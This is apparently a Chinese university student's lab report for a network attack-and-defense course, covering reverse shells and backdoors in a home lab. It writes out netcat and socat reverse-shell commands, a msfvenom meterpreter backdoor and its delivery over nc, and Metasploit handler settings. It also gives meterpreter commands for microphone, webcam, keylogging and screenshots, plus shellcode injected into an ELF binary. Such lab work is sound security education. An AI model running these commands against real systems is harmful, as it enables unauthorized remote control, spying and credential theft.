20192430 2021-2022-2 《网络与系统攻防技术》实验二实验报告
一、实验内容
(1)使用netcat获取主机操作Shell,cron启动某项任务
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
二、实验过程
任务一
使用netcat获取主机操作Shell,cron启动某项任务
首先获取主机ip地址以及虚拟机ip地址
测试主机与虚拟机之间的连通性(ping)
ncat.exe -l -p 8888 // win主机运行监听指令
nc 192.168.1.172 8888 -e /bin/sh // linux反弹连接win主机指令
nc -l -p 8888 // linux主机运行监听指令
ncat.exe -e cmd.exe 192.168.241.128 8888 // win主机反弹连接linux指令
工具测试完毕开始实验目标:使用cron获得反弹,添加反弹命令
使用ncat.exe监听反弹信息
任务二
使用socat获取主机操作Shell, 任务计划启动
在任务计划程序中创建任务,具体设置如图
达到时间后会弹出窗口
不关闭窗口,在虚拟机里使用socat命令获取主机shell
socat - tcp:192.168.1.172:1899
任务三
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
创建后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.172 LPORT=1899 -f exe > 20192430xzc_backdoor.exe
创建结果如下
将后门程序通过ncat输入输出重定向传输到主机上
nc 192.168.1.172 1899 < 2019230xzc_backdoor.exe
ncat -l -p 1899 -vv -w 3 > 20192430xzc_backdoor.exe
在虚拟机中使用msfconsole指令打开msf控制台
进入监听模块,设置攻击载荷,地址号和端口号
use exploit/multi/handler // 进入监听模块
set payload windows/meterpreter/reverse_tcp // 设置攻击载荷
set LHOST 192.168.241.128 // 设置IP地址,与后门的LHOST保持一致
set LPORT 1899 // 设置端口号,与后门的LPORT保持一致
使用exploit开启监听,出现
# [*] Started reverse TCP handler on 192.168.241.128:1899
此时在主机运行后门程序,则可以获得主机shell
任务四
(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
record_mic//获取音频
这里由于虚拟机问题并未成功实现,详见问题与解决
webcam_snap//获取摄像头权限拍照
keyscan_start//记录敲击键盘的过程
keyscan_dump//读取敲击键盘的记录
screenshot//获取主机截屏
获取提权结果
任务五
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
生成shellcode并注入
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.241.128 LPORT=1899 -x ./pwn20192430 -f elf > pwn20192430_00
进入msf控制台,由于是针对linux的32位程序,故攻击载荷变为
use exploit/multi/handler // 进入监听模块
set payload linux/x86/meterpreter/reverse_tcp // 设置攻击载荷
set LHOST 192.168.241.128 // 设置IP地址,与后门的LHOST保持一致
set LPORT 1899 // 设置端口号,与后门的LPORT保持一致
在另一个终端中运行程序,即可获得Linux的shell权限
三、问题及解决方案
- 问题1:传输后门程序时显示目标计算机积极拒绝
- 问题1解决方案:多次重复之后成功,并未找到实际原因
-
问题2:尝试提权时无法获取音频
-
问题2解决方案:在网上搜索之后并未解决,虚拟机显示无法开启声音设备
-
问题3:任务五监听时sesion不断循环增加,并未找到原因
四、回答问题
(1)例举你能想到的一个后门进入到你系统中的可能方式?
部分网络资源安装包捆绑下载
(2)例举你知道的后门如何启动起来(win及linux)的方式?
网络协议的捆绑自启动或者软件中设置后门自启动
(3)Meterpreter有哪些给你映像深刻的功能?
非常便捷的生成后门程序,获取主机的一系列权限
(4)如何发现自己有系统有没有被安装后门?
检查是否有不常用的ip连接或者端口持续开放
五、学习感悟、思考等
本次实验学习了反弹链接与后门程序获取权限,在实验中遇到很多问题,但是在同学和老师的帮助下解决了大部分,对于后门程序也有了实践方面的了解,希望今后还能继续完善这方面的知识,理论与实践相互促进.
虽然现在的我仅仅只是了解后门的基本原理,掌握了最基本的后门的生成、投送、启动,但有了现在的基础,一步步循序渐进,我会学到更深入的知识,也认识到系统防范入侵的能力很低,在以后工作学习中应注意安全防护。
最后感谢老师和同学对于实验问题的解答与帮助。